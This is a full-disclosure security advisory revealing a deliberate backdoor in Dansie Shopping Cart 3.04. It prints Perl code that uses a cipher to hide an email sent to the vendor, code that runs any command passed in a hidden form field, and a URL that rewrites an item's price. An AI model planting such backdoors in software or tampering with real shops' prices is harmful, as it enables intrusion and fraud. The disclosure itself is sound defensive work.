COMMAND

    Danise Shopping Cart

SYSTEMS AFFECTED

    Dansie Shopping Cart 3.04

PROBLEM

    One of   clients, while  installing   and configuring  the  Dansie
    Shopping Cart, ran into  difficulty integrating PGP, the  shopping
    cart  program,  and  our  secure  server  setup.   While trying to
    assist  our  client  with  the  cart  and  PGP  configuration   we
    discovered a couple of things.  This was found by joe@blarg.net.

    The CGI, under  certain conditions, sends  an email to  the author
    of the Dansie shopping cart software, 'tech@dansie.net'.  This  is
    not readily  apparent as  the code  that handles  this transaction
    incorporates a  simple Caesar  Cipher to  hide the  email address.
    The cipher is handled via the subroutine 'there2':

        sub there2
        {
            $_ = "$_[0]";
            tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
            tr/_/-/;
            tr/\@/\./;
            return $_;
        }

    The call that creates this email address and sends the mail is the
    function 'there3'.

        sub there3
        {
            if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
            {
                $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
                $b = &there2('8v59_3jhhzi8');
                pop(@there2);
                pop(@there2);
                $c = &there2("@there2");
                open (TECH, "|$mailprog $a");
                print TECH "To: $a\n";
                print TECH "From: $a\n";
                print TECH "Subject: $b\n\n";
                print TECH "$path3\n";
                print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
                print TECH "$c\n";
                print TECH "$e $there\n" if ($e);
                close (TECH);
            }
        }

    The ciphered strings, when passed through 'there2', result in:

           8v59          == tech
           kte3cv        == dansie
           ev8           == net
           8v59_3jhhzi8  == tech-support
           $a            == tech@dansie.net
           $b            == Subject: tech-support

    This seems curious, but  plausible reasons could include  insuring
    License compliance,  or maybe  the cart  automatically sends  this
    email when an  error occurs.   The program definitely  goes out of
    its way to hide the fact that the mail is being sent.

    While going  through the  rest of  the code  Joe discovered a much
    more interesting item.

        if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
        {
            if ( $ENV{'OS'} )
            {
                system("$FORM{'?????????'}");
            }
            else
            {
                open(ELIF,"|$FORM{'?????????'}");
            }
            exit;
        }

    The form element '?????????', which was originally a pseudo-random
    appearing  nine  digit  string  of  letters and numbers, allows an
    intruder  to  execute  any  command  on  the  server with the same
    privileges as  the CGI  process itself.   Although this  is a full
    disclosure list, the  trigger element is  obscured to prevent  the
    script kiddies from running away with this back door.  If you  own
    the  cart,  then  you  have  access  to  the  source  code and can
    discover the element in question easily enough on your own.

    Further searches through  the code reveal  that this form  element
    is  immune  to  data  validation  -  it gets passed into this code
    fragment unchallenged.

    The '$d' variable of the condition which permits the back door  to
    function is  set elsewhere  in the  program to  contain the string
    'dansie'.  (Again, using the ciphertext algorithm) This  indicates
    that the form  element won't work  on Dansie's own  host, but will
    work on  anyone elses.   There are  additional problems  with  the
    'there' function but we'll leave them as exercises for the  reader
    to decipher.

    Dansie.net,  armed  with  the  server  name  and  URL  to  the CGI
    executable provided by  the cloaked email  routine, would be  able
    to run commands  on any web  server on the  Internet that has  the
    Dansie Shopping  Cart installed.  It takes  little imagination  to
    dream up the potential havoc and privacy violations this level  of
    access could result in; from stealing private customer records  to
    a full-blown crack of an E-Commerce server.

    Kasey also discovered  the back door  and cloaked email  routines.
    Kasey also  provides evidence  in the  post to  indicate that  not
    only is Dansie  well aware of  the back door  routine, but may  be
    actively  attempting  to  utilize   it.   Based  upon  Joe's   own
    investigation, the information Kasey posted, and our own  firewall
    logs (see  below), it  is our  opinion that  the back  door within
    Dansie.net's shopping cart can best be summarized as follows:

        1. The back door is very deliberate.
        2. It isn't unique to the one copy we have access to here.
        3. *Is being actively utilized by the author of the CGI.

    * Based  upon the  log snippet  in Kasey's  post showing attempted
      access to the  CGI from an  Earthlink dial-up IP.   According to
      Kasey, access  to the  CGI was  attempted less  than 30  minutes
      after the cart was installed.

    When noticed the attempted usage of Kasey's server, a quick  check
    of our own firewall logs revealed the following:

        Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
        {repeated several dozen times}

    We  can  only  assume  these  attempts,  made from the same /24 on
    Earthlink's  dial-ups  as  the  one  used to probe Kasey's server,
    were from the author of the shopping cart.

    If installing a backdoor in the cart software wasn't bad  enough..
    the whole implimentation  of pricing and  adding items to  cart is
    crap..  Example  form to add  items to your  cart (kindly provided
    on the publishers site using the demo cart they set up for us):

        *snip*

        <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">

        Black Leather purse with leather straps<BR>
        Price: $20.00<BR>

        <INPUT TYPE=HIDDEN NAME=name     VALUE="Black leather purse">
        <INPUT TYPE=HIDDEN NAME=price    VALUE="20.00">
        <INPUT TYPE=HIDDEN NAME=sh       VALUE="1">  <!-- Shipping and Handling
        -->
        <INPUT TYPE=HIDDEN NAME=img      VALUE="purse.jpg">
        <INPUT TYPE=HIDDEN NAME=return   VALUE="http://www.dansie.net/demo.html">
        <INPUT TYPE=HIDDEN NAME=custom1  VALUE="Black leather purse with leather straps">

        <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
        </FORM>

        *snip*

    A couple of quick alterations and we can now add:

        http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables

SOLUTION

    The Dansie Shopping Cart bug has been removed--it should no longer
    either   email   him   anti-piracy   information   nor  allow  any
    surreptitious access.   Craig is  shipping the  patch in  his next
    update to all his customers; due to the nature of his script,  all
    customers need to update on a regular basis to remain functional.